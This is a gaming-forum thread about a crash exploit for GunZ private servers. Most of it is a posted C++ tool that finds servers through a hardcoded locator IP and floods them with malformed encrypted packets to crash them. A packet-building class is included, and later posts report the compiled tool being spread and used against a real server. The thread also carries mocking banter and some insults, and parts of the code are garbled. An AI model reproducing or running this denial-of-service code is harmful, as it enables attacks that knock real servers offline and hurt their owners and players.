Welcome!

Join our community of MMO enthusiasts and game developers! By registering, you'll gain access to discussions on the latest developments in MMO server files and collaborate with like-minded individuals. Join us today and unlock the potential of MMO server development!

Join Today!

I guess theres a new Kore huh?

Status
Not open for further replies.
Skilled Illusionist
Joined
Mar 13, 2009
Messages
319
Reaction score
8
Is it? cuz my gunz is down, Darkgunz is down, o_O??
 
Praise the Sun!
Loyal Member
Joined
Dec 4, 2007
Messages
2,502
Reaction score
986
Tsssk tsssk Phail, that's not clean C code. I'm awaiting releases like

"Private Server Destroyer V1.0 by Kyuma"
"Private Server Destroyer V1.0 by Touchwise"
"Private Server Destroyer V1.0 by [fill in a lot of other names]"

Let's sit back and enjoy :D.
 
Upvote 0
Joined
Mar 12, 2009
Messages
6,531
Reaction score
1,814
Tsssk tsssk Phail, that's not clean C code. I'm awaiting releases like

"Private Server Destroyer V1.0 by Kyuma"
"Private Server Destroyer V1.0 by Touchwise"
"Private Server Destroyer V1.0 by [fill in a lot of other names]"

Let's sit back and enjoy :D.

Are you going to release a patch for this version? =S
 
Upvote 0
Praise the Sun!
Loyal Member
Joined
Dec 4, 2007
Messages
2,502
Reaction score
986
Are you going to release a patch for this version? =S

I don't think so. I'll sit down and see what the future brings. I've heard a lot of "GunZ developers" say they can do it all, so I want to give them a chance to "do it all".
 
Upvote 0
Praise the Sun!
Loyal Member
Joined
Dec 4, 2007
Messages
2,502
Reaction score
986
xd!!!!! Next should be SQL Injection amirite?

You should have started with that, it's the more fun part. Let's make a codecave check on ' in all of those functions! :eek:tt1:

Off-topic:
- Wizkid (L) (F) says (1:39 PM):
*I don't happen to care about GunZ for more than a year now, lol
*I'm just still working on LG because all the other servers are poop, spelled as s - h - i - t.
*leeching right and left
- Wizkid (L) (F) says (1:40 PM):
*then protecting leeched files with MY stuff
*which is a lose - lose situation I didn't signed for.
*in short, I'm not doing a single thing but hanging around once in a while.
*let the leechers provide a solution (inside clue: "real gunz developers").
*signed with xD
 
Upvote 0
Praise the Sun!
Loyal Member
Joined
Dec 4, 2007
Messages
2,502
Reaction score
986
looooooooooooooooooooooooooooooooooooooooooooooooooooooool. I love the patch being 5 lines XD.

No duh. I was just waiting for some leecher to copy Emisand's login patch and apply it to all functions.
 
Upvote 0
Skilled Illusionist
Joined
May 4, 2008
Messages
304
Reaction score
41
Hi, I don't care about GunZ anymore.

Revolution.cpp
Code:
#include <stdio.h>
#include <Windows.h>
#include "Packet.h"

#pragma comment (lib, "WS2_32")

 typedef struct Host
 {
	 char szIP[64];
	 short nPort;
 }*LPHOST;
 
LPHOST GetHostFromLocator()
{
	WSADATA wsaData;
	WSAStartup (MAKEWORD (2,2), &wsaData);
	LPHOST lpHost = new Host();
	int nRecv = 0;
	PCHAR  lpBuffer = new char[4096];
	SOCKET fd = socket (AF_INET, SOCK_DGRAM, 0);
	
	sockaddr_in sockAddr;
	sockAddr.sin_addr.S_un.S_addr = INADDR_ANY;
	sockAddr.sin_port = htons (7900);
	sockAddr.sin_family = AF_INET;

	sockaddr_in serverAddr;
	serverAddr.sin_addr.S_un.S_addr = inet_addr ("67.212.81.85");
	serverAddr.sin_port = htons (8900);
	serverAddr.sin_family  = AF_INET;
	int nSize = sizeof(sockaddr);

	while (true)
	{
		sendto (fd, "\x64\x00\x0b\x00\x73\x00\x05\x00\x41\x9c\x00", 11, 0, (sockaddr *)&serverAddr, sizeof(sockaddr));
		nRecv = recvfrom (fd , lpBuffer, 40*** 0, (sockaddr *)&serverAddr, &nSize);
		if (nRecv < 1)
		{
			printf ("Failed to connect. Retrying\n");
			Sleep (30000);
			continue;
		}

		if (nRecv > 6 && lpBuffer[0] == 100)
		{
			in_addr a;
			memcpy (&a, lpBuffer+23, 4);
			
			int port = 0;
			memcpy (&port, lpBuffer+27, 4);

			strcpy (lpHost->szIP, inet_ntoa (a));
			lpHost->nPort = port;
			return lpHost;
		}
	}
	return NULL;
}

int main()
{
	unsigned short packetIDs[] = 
	{
		0x144, 0x145, 0x3F3, 0x3F4, 0x44D, 0x4BD,  0x4D1, 0x5AC, 0x57A, 0x52A, 0x522, 0x4C6, 0x584, 0x585, 0x5B6, 0x5DE, 0x6A5, 0x6A6, 0x6B8, 
		0x6A8, 0x6AA, 0x6b6, 0x70a, 0x70c, 0x178,  0x71E, 0x728, 0x72D, 0x607, 0x610, 0x623, 0x619, 0x61B, 0x770, 0x7E0, 0x7E8, 0x7EA, 0x7EB,
		0x803, 0xC1C, 0x177E, 0x17A3, 0x17A6, 0x1FA, 0x5209, 0x520E, 0x17D8, 0x5217, 0x9C42, 0x1F45, 0x1F43, 0x1F44, 0x723
	};
	SOCKET fd = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
	sockaddr_in sockAddr;
	PBYTE lpBuffer;
	PCHAR lpTemp = "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF";
	PBYTE lpKey = new BYTE[32];
	ZeroMemory (lpKey, 32);
	while (true)
	{
		LPHOST lpHost = GetHostFromLocator();
		
		if (lpHost == NULL)
		{
			Sleep (5000);
			continue;
		}
		printf ("Connecting to: %s:%i\n", lpHost->szIP, lpHost->nPort);
		fd = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
		sockAddr.sin_addr.S_un.S_addr = inet_addr (lpHost->szIP); 
		sockAddr.sin_family = AF_INET;
		sockAddr.sin_port = htons (lpHost->nPort); 
		
		if (connect (fd, (sockaddr *)&sockAddr, sizeof(sockaddr)) == SOCKET_ERROR)
		{
			continue;
		}

		CPacket* lpPacket = new CPacket (40*** lpKey);
		unsigned short id = packetIDs[rand() % (sizeof(packetIDs)-1)];
		printf ("Crashing with: %X\n", id);
		lpPacket->MakeCommand (id, 0);
		lpPacket->WriteData(lpTemp, 64);
		lpBuffer = lpPacket->FinalizePacket (100);
		send (fd, (PCHAR)lpBuffer, lpPacket->mSize+8, 0);
		printf ("Sent Packet.\n");


		closesocket (fd);
		delete lpPacket;
		
		Sleep (50);
	}
}

Packet.h
Code:
/* -----------------------------------------
   File: Packet.h
   Usage: Contains the full packet class for reading / writing to the initial buffer.
   Author: Phail
   -----------------------------------------*/
class CPacket
{
	public:
		unsigned char *mData;
		unsigned char mKey[32];
		short mSize;
	
		unsigned char *BuildKey(char *pPacket)
		{
			byte Xor[] = { 0x57, 0x02,0x5B,0x04,0x34,0x06,0x01,0x08,0x37,0x0A,0x12,0x69,0x41,0x38,0x0F,0x78 };
			byte mBytes[] = { 0x37,0x04,0x5D,0x2E,0x43,0x38,0x49,0x53,0x50,0x05,0x13,0xC9,0x28,0xA4,0x4D,0x05 }; //GameNao!
			unsigned int szTmp = 0,szTmp2 = 0,szTmp3 = 0;
			memcpy(mKey,pPacket+12,4);
			memcpy(mKey+4,pPacket,12);
			memcpy(mKey+16,mBytes,16);
			for(int i=0; i<4; ++i)
			{
				memcpy(&szTmp,Xor+(i*4),4);
				memcpy(&szTmp2,mKey+(i*4),4);
				szTmp3 = szTmp ^ szTmp2;
				memcpy(mKey+(i*4),&szTmp3,4);
			}
			return (unsigned char *)mKey;
		}
		void Encrypt(unsigned char *szBuffer, int iStart, int iLength)
		{
			for(int i=0; i < iLength; ++i)
			{
				unsigned short a = szBuffer[iStart+i];
				a ^=mKey[i%32];
				a <<= 3;

				byte b = (byte)(a >> 8);
				b |= (byte)(a & 0xFF);
				b ^= 0xF0;
				szBuffer[iStart + i] = (byte)b;
			}
		}


		void Decrypt(unsigned char *szBuffer, int iStart, int iLength)
		{           
			for (int i = 0; i < iLength; ++i)
			{
				byte a = szBuffer[iStart + i];
				a ^= 0x0F0;
				byte b = (byte)(7 & a);
				b <<= 5;
				a >>= 3;
				b = (byte)(a | b);
				szBuffer[iStart+i] = (byte)(b ^ mKey[i % 32]);
			}
		}



		unsigned short Checksum(unsigned char *szBuffer, int iStart, int iLength)
		{
			unsigned int uiSum = (unsigned int)(szBuffer[iStart] + szBuffer[iStart+1] + szBuffer[iStart+2] + szBuffer[iStart+3]),uiSum2=0,uiSum3=0,uiSum4=0;
			for(int i=6; i < iLength; ++i) uiSum2 += szBuffer[i];
			uiSum3 = uiSum2 - uiSum;
			uiSum4 = uiSum3 >> 0x10;
			uiSum3 += uiSum4;
			return (unsigned short)uiSum3;
		}
		void WriteData(void *pData, short pLength)
		{
			char cZero = 0x00;
			if(pData == 0)
			{
				for(int i=0; i < pLength; i++)
				{
					memcpy(mData+mSize,&cZero,1);
					mSize++;
				}
			}
			else
			{
				memcpy(mData+mSize,pData,pLength);
				mSize += pLength;
			}
		}

		void WriteString(char *szBuffer)
		{
			short wSize = strlen(szBuffer)+1;
			WriteData(&wSize,2);
			WriteData(szBuffer,wSize);
		}


		short ReadShort()
		{
			short s = 0;
			memcpy(&s,mData+mSize,2);
			mSize+=2;
			return s;
		}
		char *ReadString()
		{
			short wSize = ReadShort();
			char *szString = (char *)malloc(wSize);
			memset(szString,0,wSize);
			memcpy(szString,mData+mSize,wSize);
			mSize+=wSize;
			return szString;
		}
		byte ReadByte()
		{
			byte out = mData[mSize];
			mSize++;
			return out;
		}
		long ReadLong()
		{
			long out = 0;
			memcpy(&out,mData+mSize,4);
			mSize+=4;
			return out;
		}
		byte *ReadArray(short iSize)
		{
			byte *bArray = new byte[iSize];
			memset(bArray,0,iSize);
			memcpy(bArray,mData+mSize,iSize);
			mSize+=iSize;
			return bArray;
		}
		short GetLen(int iLast)
		{
			short wOut = 0;
			for(int i=mSize; i < iLast; i++,wOut++)
			{
				if(mData[i] == 0){
					wOut++;
					break;
				}							
			}
			return wOut;
		}
		void SkipByte(short wSize)
		{
			mSize+=wSize;
		}
		void SetPos(short pVal)
		{
			mSize = pVal;
		}
		void WriteShort(short pIn)
		{
			memcpy((mData+mSize),&pIn,2);
			mSize+=2;
		}
		void MakeCommand(short wCommand,byte val)
		{
			char cPacketId = val;

			memcpy(mData,&wCommand,2);
			memcpy(mData+2,&cPacketId,1);

			mSize += 3;
		}
		unsigned char *FinalizePacket(unsigned short wVersion)
		{
			unsigned short wLen = mSize + 8;
			unsigned short wLen2 = mSize+2;
			unsigned short wChecksum = 0;
			unsigned char *szPacket = new unsigned char[wLen];
			byte bZero[] = {0x0,0x0};
			
			memset(szPacket,0,wLen);
			memcpy(szPacket,&wVersion,2);
			memcpy(szPacket+2,&wLen,2);

			if(wVersion == 0x65)Encrypt(szPacket,2,2);
			
			memcpy(szPacket+4,&bZero,2);
			memcpy(szPacket+6,&wLen2,2);
			memcpy(szPacket+8,mData,mSize);
		
			if(wVersion == 0x65)Encrypt(szPacket,6,mSize+2);
			wChecksum = Checksum(szPacket,0,wLen);
			memcpy(szPacket+4,&wChecksum,2);

			return szPacket;
		}


		CPacket(int pLen,unsigned char pKey[32])
		{
			mData = (unsigned char *)malloc(pLen);
			memset(mData,0,pLen);
			mSize = 0;
			memcpy(mKey,pKey,32);
		}

		CPacket(unsigned char *pDecrypted, short pStart, short pSize)
		{
			mData = (unsigned char *)malloc(pSize);
			memset(mData,0,pSize);
			memcpy(mData,pDecrypted,pSize);
			mSize = pStart;
		}

		CPacket(unsigned char pKey[32])
		{
			memcpy(mKey,pKey,32);
		}

		CPacket(){}
		~CPacket()
		{
			free((void *)mData);
			mSize = 0;
		}

};

Oh great.
Did you give a compiled version to NicK?
Or was he smart enough to compile it himself?
He's using it to crash my server. ._________.

WooAf: Connecting to: a.b.c.d:e | Crashing with: 1F45
WooAf: Please fix the 1F45 packet.

And then he spammed the compiled version all over my shoutbox and forums.
And I got no idea why.
Great. This is so gay. >____>
 
Upvote 0
Custom Title Activated
Loyal Member
Joined
Nov 5, 2006
Messages
1,358
Reaction score
15
No, you are incorrect. You don't seem to get my point. Too bad.
What I'm seeing here is Theo being an butt pretending he's too badass to care, and you being too cool to do something about it.
 
Upvote 0
Praise the Sun!
Loyal Member
Joined
Dec 4, 2007
Messages
2,502
Reaction score
986
What I'm seeing here is Theo being an butt pretending he's too badass to care, and you being too cool to do something about it.

Then that's your fault. I'm trying to make a point here.

My point is that some "GunZ developers" are leeching left and right from me and other, real, developers. I don't care about the leeching itself, but they are pretending they made it all on their own, and they say they can do everything they want. Well, those kids started to annoy me several months back. To be honest, a lot of server owners pretend like that (for example, Kyuma). So my point is to let the leeching developers create a patch (they "can do it all") while I sit back and enjoy some hilarious conversations.

Oh great.
Did you give a compiled version to NicK?
Or was he smart enough to compile it himself?
He's using it to crash my server. ._________.

WooAf: Connecting to: a.b.c.d:e | Crashing with: 1F45
WooAf: Please fix the 1F45 packet.

And then he spammed the compiled version all over my shoutbox and forums.
And I got no idea why.
Great. This is so gay. >____>

That's #1.
 
Upvote 0
Praise the Sun!
Loyal Member
Joined
Dec 4, 2007
Messages
2,502
Reaction score
986
When I'm talking about ego... o.o
I'm an ego-tripper on msn when I get provoked, sometimes.
I don't get what you mean though.

It's a joke which some people will understand and some won't.
 
Upvote 0
Praise the Sun!
Loyal Member
Joined
Dec 4, 2007
Messages
2,502
Reaction score
986
Explain.
Is it good to understand it or not?

It's a joke so it's funny to understand it. But, as usually with jokes, there's always a part of humans that don't get the joke.

Let's not get further off-topic and head to bed.
 
Upvote 0
Skilled Illusionist
Joined
May 4, 2008
Messages
304
Reaction score
41
It's a joke so it's funny to understand it. But, as usually with jokes, there's always a part of humans that don't get the joke.

Let's not go further off-topic and head to bed.

Well yeah, there are jokes which shouldn't be told.
No school tomorrow due to the extreme weather conditions (snow).
Okay let's stop going off-topic.
 
Last edited:
Upvote 0
Status
Not open for further replies.
Back
Top